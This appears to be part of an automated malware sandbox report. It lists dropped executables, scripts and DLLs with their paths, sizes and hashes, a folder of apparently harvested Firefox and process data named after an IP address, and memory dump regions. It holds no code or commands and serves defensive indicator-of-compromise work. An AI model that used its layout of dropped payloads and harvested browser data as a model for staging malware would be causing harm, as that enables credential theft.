dbe85d0915478dcb72c2b1d563d647e8032565fd15848ede0c17173815c16ba00e7a44bde2904c9fe5b015c0d3ca6dc8233d87c3813a2cee200df9611cb416aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
6KB

MD5
66c24998a3e8efdbde30e81b65c4418c

SHA1
901ab1814c66e6b5c560c1f8f6af3f68e5e14f25

SHA256
9e808d8db4bbbe7959a083b78f676de67228513a5a6f9ce8cc8f5e4a581567e1

SHA512
031a931fd6a867417619d30266c079a1d0f383c291e5a4824faefd4e298f40b0cc6399862624c1fbe82e3d63df76e83d0fe5b1b9356fdba7a5e68c01624d4196

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
4cf50b69490174806d7e1cfda2e6a4d5

SHA1
f750bf071e4353258796cc0cdf1bb81f71f5d1ce

SHA256
f44c63ddac0050bbd8a4d63355aa09c58a405859ccc3eeff6e2415a669e04976

SHA512
2b2debd2a9974c441e08a7ed2ceb80663ecb626b6c6f39037ba1c8fafbc4217d5b62ecac7fe7a4db6058e269912a02cd11a17fe6df20f6abc940d69f47e5201c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
9ce6eacb4e1732fc10b81133597a9b1b

SHA1
c55d96410f1abcaa17e7ac1b95bda4636ebfdc6c

SHA256
fa8258e24ef13030ad7d1cae55c9617e1aa934dd3887beda3572739629560eba

SHA512
b22ad75b85a9358a8bf110524d2bb95121a341ea9e2da846f527b3bf8adbc416df1d86542f87905e70b5a179a947d1b1f2b0706b20cb4036ca901ee11077d37a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
deeb4fcdd3c118bab2ad195f5599da40

SHA1
bc68b6270075516c6b930060dddf3ec83608af5f

SHA256
224327d5ac256dfa4f0e736e45347ce0cedd662fe313ec7ee09b285b1a4ebb33

SHA512
179e81ec31dec4a9aa7ba6fb2c1e660a83007415ed7fbd36b218759c23b9473f28fe675e447888e33ce9aaa44041c835becec4cd98dfff8b9014af26c25ffa68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
0344e953c9f882a5c58d47cdbb07c616

SHA1
799ba744e42f0d136b11a6352de64f1dccb5cebe

SHA256
bf92f45ed06e2454ff2fb5a826d50a9de8e102dd5e351f2be2d9d40eaa633f5c

SHA512
134875351d7bf8d4473dfb33239fac85ab6645e3e381df553d1a189e512e32f0e41b0e59b1eb15a1d226571b27d14b2d60e125a5ff15f2f22c8542bf73df5d51

Download Submit
C:\Users\Admin\AppData\Local\TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE

Filesize
1.8MB

MD5
4b3d6041b7fe0ec4f9a9d9d4a15becd5

SHA1
7bd1aa4602463ff713c72b522a536d2e3d3470ab

SHA256
3f37caf3f24d9f536b6827e5099d0aebc79378084856d39ccb61b10dccff05d0

SHA512
5fbcbe3bfafdf3cfb551056c5c31992ba1695de816b4df30d8fea420b647eca7ff1df93f50f349e6237f181482863d8fc3c4819654d8509d302b44e8527e5946

Download Submit
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

Filesize
1.7MB

MD5
6d7adc96b310e80799325edca02ff778

SHA1
35d97327d3d1c5ce920051d0552b2ee510bb919d

SHA256
e5186a04536313599bea259d6fefac44b168d81e08dcc36e54b2c6ff08374efd

SHA512
feb351fa6d4f4d342ff8456812fd2c9dfba8122b94e6c2d11ec4b045f4975d9f0dc2b6388d9e4c6d4ab98287bc6dc56369e5c96f10cf0b62ad7a2f81ba821212

Download Submit
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe

Filesize
1.1MB

MD5
3928c62b67fc0d7c1fb6bcce3b6a8d46

SHA1
e843b7b7524a46a273267a86e320c98bc09e6d44

SHA256
630e00afe98ad4c1db391b74a84b7822a3abb3867a34f2ba163a8bf26d8d4397

SHA512
1884b125c89e32b6e5924e87ad9af827ae7e950ac80411e00a58c465eed88060af72142f9c512e0323e1ade46061f56a5247351e1c1d5e268f2ba35b5e447857

Download Submit
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe

Filesize
2.0MB

MD5
28b543db648763fac865cab931bb3f91

SHA1
b6688b85d6c6d1bd45a3db2d108b6acf7467b0b4

SHA256
701b7ef0b368ddbe9e3d2ddaaaf10284287f38799e536336dc4c821930f13906

SHA512
7d514fc036efc8d57d400e7e84f5b565f40dc0f74a536c708b3fe5d6725e5d4541157e29f514e0706fad6d4159e0b863bedf757eca4df3e87927e462502a02d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe

Filesize
7.6MB

MD5
3648b2b9479b2615023cb83b1f90e062

SHA1
549008decfc86d41e0c097332e007c531d0ebe55

SHA256
2de7d5f50733dfbf90c0c8602635d5fee3a607c87b71f3b1dd10d711bd17bbc6

SHA512
41e52da013198695515bde9718818b35a8b232fecb21d5a7d21dcfd9f68cc032b322ae543740d824cca52c3d3d61bc3d312f80959336d16bcf6107eae7483008

Download Submit
C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe

Filesize
1.2MB

MD5
646254853368d4931ced040b46e9d447

SHA1
c9e4333c6feb4f0aeedf072f3a293204b9e81e28

SHA256
5a6764d23bb3d50f08f15b95e214a6dca0afb78e7416a21b72982c3649a49e9e

SHA512
485f252cd358ea41be648e013dc3ddeee1e57f8dea3ef42a5c8236a9769e7ebcf8bae1d5a36f55b6fb2cdcbbcf1878eca7d7885b63445cb081688a9512512819

Download Submit
C:\Users\Admin\AppData\Local\Temp\10045720101\b54ce0e752.exe

Filesize
4.4MB

MD5
32558056268893627b2a032012585436

SHA1
b2c34e5183b4be9de67938b9f6e9467af57c452f

SHA256
789a89255ac190fee25b057f0a66b5a288b7f61f6708c3adcc05d8364b53aa77

SHA512
25f0c120ceac41a1d418386909862432226393d4aa3c673bdbe72e845389f14bf700ccc82eb1d719ef85f13489862b648ca063278f67aa6ca32fbfaa0888f372

Download Submit
C:\Users\Admin\AppData\Local\Temp\10045730101\a333dbd0fc.exe

Filesize
4.5MB

MD5
ddb5b5c2bf85abecf2ddc72f2fac202c

SHA1
f043d9d4bccb2f126e2b90266436766c228d9855

SHA256
3cdb9456e80ecf9bd068bd4205f95862470050900126d6a3624ad0d80035bdd2

SHA512
831b1a71303c07991bfc2a92549626ffb3d4e39681f1a9dcd9add769e52648fd91daa55fc9579a79dc0f30665d65c35c462f224494794679d3f0a09b58736c98

Download Submit
C:\Users\Admin\AppData\Local\Temp\10382310101\h2kC2YI.exe

Filesize
2.1MB

MD5
3a975ae4a3d8171856a92bdfad7bc4d2

SHA1
443f5e9fed4eccf8f2678ec470ba12e595d818d3

SHA256
3e5f345f426d185beb5672e174aa6b05d84c0f0a206ed6cbd325102e4bca7f8e

SHA512
8f53fa6b1ff7ecce4bc13fcd5b6516a5a17c0bd4e1b9c7870d3dbd137fed61bd54ad01046b042d82f331aa6d10826e565739d8e5209701ce657a7af25f2d539f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe

Filesize
1.9MB

MD5
bbed5d43e4e69a27c137bf5d3c3847f3

SHA1
17d9b9585f5f00f4f1d53dfc5a6365898023c8a8

SHA256
f2792c40162c59b66afea7f6deef975afdce331d51da1a6487e558b30d7db4cf

SHA512
cce7d91abae9b4afbbd5419862568b8d6bb354bbdb0b14b5e1dba7bed5d5fe3fd1dc8c644113aa624c4532a73883fcb335384bd44d4c235feafded9bef0a9239

Download Submit
C:\Users\Admin\AppData\Local\Temp\10382880101\apple.exe

Filesize
327KB

MD5
dfbc5f5696ac1ed176979706f40923e8

SHA1
b3ad04189502558184037ae150f1ae4e50927560

SHA256
98d2ce957150f0163bc11537b259e37fda34304aa39702a331fad8070dbf97b5

SHA512
0aa50d39b0f1cb7ee9c1e5004ce5aa3905317bdb605f8efdf13977abfce423292fe1acfb698504e36f567604a079c1fde8a1ff60b96141be5b969dfa018ae22f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10384640101\BCmr6Ki.exe

Filesize
9.8MB

MD5
9a2147c4532f7fa643ab5792e3fe3d5c

SHA1
80244247bc0bc46884054db9c8ddbc6dee99b529

SHA256
3e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba

SHA512
c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\10385100101\JmKitiE.exe

Filesize
847KB

MD5
b7d7540b03ab0cf6468034b270b078de

SHA1
7ce50f45a19cee7f9fdd3e5ef8e907a92b7687b3

SHA256
a38bd970e7153a7060bd7f77a656b8ab0a019cf2cbc9c80771db8556d378ee35

SHA512
a1f31660053a48e2c3a65790fe32b7fbb2211a8f1a40c85015cb24162f81954f88292e06f6f07d10d0219216fdf51017782c284e7d455159eb27278f18c2e801

Download Submit
C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe

Filesize
180KB

MD5
62458154158eb08dd28fdbf62469e4c8

SHA1
6ce11d490152999b61a5186c8ea0b71a9159a659

SHA256
c0fad729097860c1e9777f60c6519c3a772b005b4c6c990534e17a9c51b2d755

SHA512
82525e8b80d4b1752fac341772f4ee0e40cc51533b2a50d3128e4071c1be750d5ad8def21b172e70aca1e3908c97a85c561bddd030847f40f2a9963db3b30881

Download Submit
C:\Users\Admin\AppData\Local\Temp\10385660101\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\10386380101\LKAGEY3.exe

Filesize
3.6MB

MD5
e0eb76c6ce5cc3b9d672b89391a27763

SHA1
2e715355b0f85476ef275907f14d9522529e57f8

SHA256
b5cb9010a7b28013748176b189a0fcbaf4e9eb3a167d1326990afc87bd046678

SHA512
b47f8ba26c6db87f4424bd33d2f99c12ac48ccbb3fdc36273ace4c87a529141f7a57415c74e5ef7dccca07eb015fdab938db9cd3592aa288a12088e452e8004c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe

Filesize
11.2MB

MD5
fe4e4833ef059f2bffe16ed024a461a9

SHA1
0b1e4cc1762447ee79989c328d2f78dc15e4d33c

SHA256
fe0b20c7595251a2b626f8643c29ada476410ddc9d87b9c4dc84f637fe99dc95

SHA512
d820afefdb4c6b22491f54678839044a5c6937754868dc5972cc66bb997c7ce5cb87037157e99ac51bb75bb67cbaed0a46b0ce94ac518c3f04f05985dbdc4f16

Download Submit
C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe

Filesize
6.0MB

MD5
632c3c0bf42250d7dd47818f33b24d4f

SHA1
f57a0188b0457b03e4cef1c82efdc7e6a9cee3a1

SHA256
ba33703aa30995b74f5c84c97eb3483b624082d1987b059ff88ee5eade2af683

SHA512
206c0982372c2e42af1603d623994581e7338a0c2cce564a1a6b944fe8a3d3bbad815f5b65783e23f129662c0c64943307c3d585dfb5f6dd53a1fc5512b2d642

Download Submit
C:\Users\Admin\AppData\Local\Temp\10387290101\4f3de4766b.exe

Filesize
2.0MB

MD5
aee86789d93dfe62d49f89de1b3ee05c

SHA1
ed1175376604749f652fb8084eb69e9553c03c90

SHA256
ffa91d35c7fd7332a7b88b91f6d8f7fc9d24d55328c00f911cb7697f4bcce327

SHA512
ef9cc3aa839cdf9558fbabb206598a565af40c7ba1971b3f4ea667407a7f13ab71ef1c737ec44dc93c4198320a7c847ce7ccf933f19c69c77143c8ad98a2f09f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10387300101\53aac28b9d.exe

Filesize
1.7MB

MD5
7e892917b93336fb4a14dd67a5674bbb

SHA1
c09ae8085ae11e70c2a0135f381fd4234f3d092c

SHA256
787c658a2bbd282c6b5aec357ddbc049ff158b00528e49323e0375c0d02e3a7d

SHA512
a8d9b8e488b84b9cd8bc7d3e636dc1e5b6100b5aa21c9c9ea11038d70881c584cbb789c92a67f2ad084e04419e84aeffa232d39b8fe55841e3bbe7af847749a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10387310101\c1ff774522.exe

Filesize
949KB

MD5
8c279cf09aefc79c311ee5a662a4d418

SHA1
b6533314666ddddb8fd182c8937caeb4f0571f48

SHA256
2ea005e390851be19d2a0d310b723f0f4abf1c6b4a72ba5656f91725f7d1ce3d

SHA512
85130aa7baa4a15da481226bb3477372d88f7b286fac8cb1dc499b1c40907543ffeb86eac764fde525163919c4e2485d977495d5a9fb7482de02561972cd7e47

Download Submit
C:\Users\Admin\AppData\Local\Temp\10387320101\5361387e9e.exe

Filesize
1.7MB

MD5
e08fa849661a77d1b20e39b99d060403

SHA1
91229676469a2e3ad0a989b572985f35c5ed28a9

SHA256
9d87d29881ee231edd7cbfdbecdbd3987b02f8c6cfddf45f52e2d77bb5b22389

SHA512
3a1014c86a1ae5467c976ad0a2e804a336158a7b61df5500450b1dde02eb6f52b09810081bca0f35c7412006506f9a772aa35e8f44a1943041a21e32c8d91524

Download Submit
C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

Filesize
81B

MD5
ea511fc534efd031f852fcf490b76104

SHA1
573e5fa397bc953df5422abbeb1a52bf94f7cf00

SHA256
e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

SHA512
f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

Download Submit
C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

Filesize
4KB

MD5
58be20c02d20a18d6f053adacb41fbd7

SHA1
0df3d4cf0e0418c37a6b96b5e0630e7e0699c165

SHA256
65f6d9864c31b27655fa0f8b1c2599dfa180a85b082ee572ae2bca94c3c029f1

SHA512
74f13b6247a05a0214f51fbbe25cd91bdae00703a342e7441eac4035ec6ed27e005df51231a85c428defde49c0ec733f645cae9a579987ccf8ad42ae2cfed82b

Download Submit
C:\Users\Admin\AppData\Local\Temp\221.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\2pdv1Emfs.hta

Filesize
717B

MD5
c5a9992fd341999ef820b1e79f72ba94

SHA1
0a7e16c4b7376b0c12f5e1931cd8dcc473a843c9

SHA256
7014712bda59caea3ddea0baac0a2d49b53e132b8cfc0a5dfd0433862cad6033

SHA512
9c1a770055adcd8879b6dce25d55b818db6cb7ae20a9a3c9bca2f41b977e0cdf18281e4aeb45c948738bcbf684744534ebad2291546557c6beeb0f2f575775d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
8.2MB

MD5
d993d193423d8146932f152b952ecac6

SHA1
8da7e618510d34b83b405506c7dddc2200c243a9

SHA256
0705041d5f680ce4dd9e8d472f2dadd04f3802dc66fb01f8e1fc6f5a6a3eecc2

SHA512
7e6642e9262d83dad078336a2f57064c5328b83f46c0d05d035e937babde0a04836cd08686682b3bbbe917e0610423aa8c114b9bd066ed6c0788f1625126a0d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FC71.tmp\FC72.tmp\FC73.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe

Filesize
2.1MB

MD5
57973391c12eacafdc04647b27b2f439

SHA1
4d0c9b6bfd8819fdf83fc042e0d2d363c9ac47be

SHA256
4a68f65ec41bd361d2f54fc9d8152a2e6c584296be0eaf302078a2b0cbc881d6

SHA512
878278ef05b8c3f4ff7fc1dfebe3ae00b329f3d9463805b8b69c1cfa41927b24b9297ba999b637d2c1e80f5277a43d5249b276e31e510a81c6aa96555f208e4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmodfntz.ry2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-FLRJM.tmp\Bell_Setup16.tmp

Filesize
1.4MB

MD5
68f080515fa8925d53e16820ce5c9488

SHA1
ff5a1cc48e0dcfed469e6a5e8a07cb643f58170a

SHA256
038f72a66df8456befeacc89394c29f74e1ea043812f66191fd9f0c28b035975

SHA512
f44cb0650668cfd1e1c71c968837fef42a0a07cb694cf4a7ff2cc5bdbaece319f625ae558c5ddd1990fd34ecf2cecda1f6a77687499b62c91cf9ebb2e2188a67

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-RL8G7.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe

Filesize
2.1MB

MD5
85f03b4f782d4a5ed2db22248a914670

SHA1
354b13d3a1379a190bb1b4c87cfb45897f2ed5b2

SHA256
06a0c5ec948b65d8377b784b32f0beed36585a0c800b7ef378ed4d2bc6619f66

SHA512
756d4ad7f6e5908e0068838773b2b43ba6cb855bc1ecf1c6cc399a3d349dc9eab67d2e07b212031bdf21cb3d10181f8e427e45a2d658dcab08ea9d98980476fe

Download Submit
C:\Users\Admin\AppData\Roaming\1wlanapi.ocx

Filesize
5.0MB

MD5
06f34c0c9aacc414c5c438031a8b21ec

SHA1
e2f2c0d7399283fa637cbbf490368509f475d0b7

SHA256
95d9217b08738b2bbd0d0c9eec7d3a3ccf574a81968e071b85571b86c64cdbce

SHA512
3935e1f59abe025f231120dfbb43ea52dc41a59361fc9f3b7df41d083062cff588b5f7425327bec92e349cb5b7f691db88f7e113ec6c953c2018b7246c5fb0a9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\AlternateServices.bin

Filesize
11KB

MD5
8109a184414952fbb312eed05960f281

SHA1
2eaa7f61e802b3b724f11150441d0357dc343381

SHA256
1e35f6879c47f9540041d34535f56b550a947013c8a68808b78f89f2b76105d8

SHA512
6c236b76773193d306b5a644e3e3ab1f3188329e1a54f4c3c1af94c2b3a562e1ead4f400aa64531b68a681095b2f951ac198f9056bfd722fbb6e424b7709ab04

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\db\data.safe.tmp

Filesize
29KB

MD5
fdefdb9d1fdaaaa063df2960f0dd779c

SHA1
708e04bbad40aba68fcf0ecded6542556477b0ed

SHA256
6c192fb609f577515392ee244c5698a89926620fe49e69f61c24dc875a61d59e

SHA512
7b967fd733b967c63ac13e1b76216bec8a00cbb396107f3f85171c1a3fd6ccd54875b67c230f963096927fc58ab1f4d0d8151b1d75f0d226811867fdfa53919e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\db\data.safe.tmp

Filesize
29KB

MD5
941399833ae77e83a47cef8d8d9a79b9

SHA1
f498558a16838aad74583f314c22e56de4388a03

SHA256
dee413930d22fd2da5859566371f75b1abbdb8c220f6127ac4d2e33f9768adce

SHA512
07cceee544ddd38bebfca1e12500d309c44e09ccfcf5fee5af78d4d1b3c4b9a50ff3c34f3ce1ce740c101d0be4c0ae5a1d01ad7256dd96f0e7c0c83b84bd6893

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\events\events

Filesize
1KB

MD5
158d2898e40b816421fd1aee4586584f

SHA1
c7ba883d30dd42e84ece9314898cde3aece7a731

SHA256
ac213ad175c4b8467211f0861744478d94b86b2facd2efd07425a4ce53d59e00

SHA512
6b518995065dccacbd5c6e2a2a514a013cc9fd60e510e8b9e2385e2cbfe3894ad87913a00e51fa0d7b07aff3b256b1a0fe05238ce3dab3cba9add7d702f57bd1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\015ab5a2-836d-4841-bc18-97caca3fa651

Filesize
235B

MD5
0ceac90acbac07f0c14bf6d15824fd86

SHA1
a63da32c452fd9d50860a8cf12e848051bb6c722

SHA256
75f084153974f2b21c8c18419af7c7c3606294d2b13d67316589a413d17f8cfd

SHA512
302eeb3a8122d551ef28876a6aa4022bcceaaf8da865f6588b2d0f0c62eb16da6767a85a87dc5c482f1784ec3246825546bfcd9d60ce574c82e93f2a293e81af

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\78d1fb5c-1278-4145-8b97-ffe0256bb48d

Filesize
871B

MD5
f7d2b625f6f0c7dbbb511a2d3621e3b5

SHA1
6f317b4c159622ba4a3cd5bb80069d45ca76212b

SHA256
1fae68bb33443231b13cd6046cca6c6990d5c214f4020bd93b4aebdb0fdb9d72

SHA512
43879fd81c8f19fa2330eb65954d32c6e615d0f7b11be5d4ba4fd7b700ddd45f049da8582cea3a3a48ab9cb8722382137d94c5e12bd9a8d7a25185eea2902a06

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\9c6fa587-f7b3-4be5-8850-04517b644f61

Filesize
886B

MD5
1a07c4a4d7683934c93756bfdb4b7766

SHA1
0bd9101532b6812f84f5eb6c4a44ad25521c883e

SHA256
d0c9b063f53571476a1bb6f4e988f2d693a0cbc0b810988289b8abc98392dba9

SHA512
44c5be4e221eb584cd78e81c311c8199209472bc7952aef3b138261e8c0968cf494755b2a861217c0930b6bc700e007d62c5777c466344e037f5817931e53f60

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\e84eb8cc-29bc-451d-bd4e-daf822e7b5ec

Filesize
2KB

MD5
245aa42d75aa64b48bb8adfa70ac5afa

SHA1
8c8a343d7893e65b0610f1cdec23f6c597ff8258

SHA256
2e92d70c5ef2390e64895f43dfafdb07fdf9517f9dd4a72386fc5a5767f7c358

SHA512
a373db0240ea8fa5f68daaa9aa266e6e3cc24f751b4cad4fc61ccf485653da330b7b091b40413bb7dd4a1a5a7874e4dc9759a70a2ddba3703a10d7f35ce9d8ec

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\f5bca5c1-3c89-46d1-a763-9840f5f909ba

Filesize
235B

MD5
2925dc1e4e6360c50fd0643feb40c360

SHA1
03f8b1346075ff0c061d8902023257d6b0f2117e

SHA256
56fc50571e42ff916b3e6c3fe02496a414bd6ef9e4c2a09df8d8f8a849ddd6ad

SHA512
883fc1237687e6143810f9c11f3d5667dc0741c04b9b9047ded4b70b9319d247c882fbacca1a5939fa66a98e29409525374e257346b0ffc6404d60134e9ca008

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\prefs.js

Filesize
6KB

MD5
7f382528b705e34839495349cc18ce64

SHA1
8b43db4c701b4a7c90f32aadf626d5cd47942465

SHA256
1eb72b9ec300f15393b83014fc9d5d656856700040d44e8296d9015ea3f1bf62

SHA512
f21370b829c62f5f2f65056c5b5d8e95adab2efe72187ec0735dc25ed4516a406a0f19c82da8b36817ddc0300f8c77f2f0f69ccfd28c055d68523c9d5ea949ce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\prefs.js

Filesize
6KB

MD5
a38976b6d3ea2037f4e45b9f53e8d948

SHA1
8764ddf665677055fde1985f7cd57f357ae011f4

SHA256
49a51e6b348b3ce53bf4fbc52e7ce2ce1896cccb72edc6d4a8d38c22a06841b7

SHA512
0737b6606631e7882a38a465dd778d8cf100dae4d846ed2bd921cb8142ac0eac5542c85ff97984592536e154cc7a569098ce509f512e26fb47e86bcabe9096ff

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/180-1119-0x00000000004E0000-0x0000000000B83000-memory.dmp

Filesize
6.6MB

Download
memory/180-1244-0x00000000004E0000-0x0000000000B83000-memory.dmp

Filesize
6.6MB

Download
memory/448-546-0x0000000073D30000-0x0000000073D7C000-memory.dmp

Filesize
304KB

Download
memory/744-166-0x0000000002DC0000-0x0000000002E22000-memory.dmp

Filesize
392KB

Download
memory/744-165-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/828-505-0x0000000006F60000-0x0000000006F6A000-memory.dmp

Filesize
40KB

Download
memory/828-491-0x00000000060F0000-0x000000000613C000-memory.dmp

Filesize
304KB

Download
memory/828-489-0x0000000005710000-0x0000000005A64000-memory.dmp

Filesize
3.3MB

Download
memory/828-493-0x0000000073AA0000-0x0000000073AEC000-memory.dmp

Filesize
304KB

Download
memory/828-503-0x0000000006B60000-0x0000000006B7E000-memory.dmp

Filesize
120KB

Download
memory/828-492-0x0000000006BA0000-0x0000000006BD2000-memory.dmp

Filesize
200KB

Download
memory/828-504-0x0000000006E30000-0x0000000006ED3000-memory.dmp

Filesize
652KB

Download
memory/828-506-0x0000000007130000-0x0000000007141000-memory.dmp

Filesize
68KB

Download
memory/1352-737-0x00007FFEA8620000-0x00007FFEA862F000-memory.dmp

Filesize
60KB

Download
memory/1352-667-0x00007FFE868E0000-0x00007FFE86ED0000-memory.dmp

Filesize
5.9MB

Download
memory/1352-736-0x00007FFEA4570000-0x00007FFEA4594000-memory.dmp

Filesize
144KB

Download
memory/1352-738-0x00007FFEA4B00000-0x00007FFEA4B19000-memory.dmp

Filesize
100KB

Download
memory/1352-739-0x00007FFEA05A0000-0x00007FFEA05CD000-memory.dmp

Filesize
180KB

Download
memory/1352-740-0x00007FFEA04B0000-0x00007FFEA04D3000-memory.dmp

Filesize
140KB

Download
memory/1352-741-0x00007FFE913C0000-0x00007FFE91536000-memory.dmp

Filesize
1.5MB

Download
memory/1352-742-0x00007FFEA1480000-0x00007FFEA1499000-memory.dmp

Filesize
100KB

Download
memory/1352-743-0x00007FFEA6850000-0x00007FFEA685D000-memory.dmp

Filesize
52KB

Download
memory/1352-744-0x00007FFEA0010000-0x00007FFEA0043000-memory.dmp

Filesize
204KB

Download
memory/1352-746-0x00007FFE868E0000-0x00007FFE86ED0000-memory.dmp

Filesize
5.9MB

Download
memory/1352-747-0x00007FFEA06C0000-0x00007FFEA06D4000-memory.dmp

Filesize
80KB

Download
memory/1352-748-0x00007FFEA4760000-0x00007FFEA476D000-memory.dmp

Filesize
52KB

Download
memory/1352-749-0x00007FFE912A0000-0x00007FFE913BC000-memory.dmp

Filesize
1.1MB

Download
memory/1352-745-0x00007FFE9C2C0000-0x00007FFE9C38D000-memory.dmp

Filesize
820KB

Download
memory/1352-735-0x00007FFE8A150000-0x00007FFE8A679000-memory.dmp

Filesize
5.2MB

Download
memory/1352-710-0x00007FFEA1480000-0x00007FFEA1499000-memory.dmp

Filesize
100KB

Download
memory/1352-683-0x00007FFE868E0000-0x00007FFE86ED0000-memory.dmp

Filesize
5.9MB

Download
memory/1352-684-0x00007FFE9C2C0000-0x00007FFE9C38D000-memory.dmp

Filesize
820KB

Download
memory/1352-690-0x00007FFE912A0000-0x00007FFE913BC000-memory.dmp

Filesize
1.1MB

Download
memory/1352-689-0x00007FFEA4760000-0x00007FFEA476D000-memory.dmp

Filesize
52KB

Download
memory/1352-688-0x00007FFEA06C0000-0x00007FFEA06D4000-memory.dmp

Filesize
80KB

Download
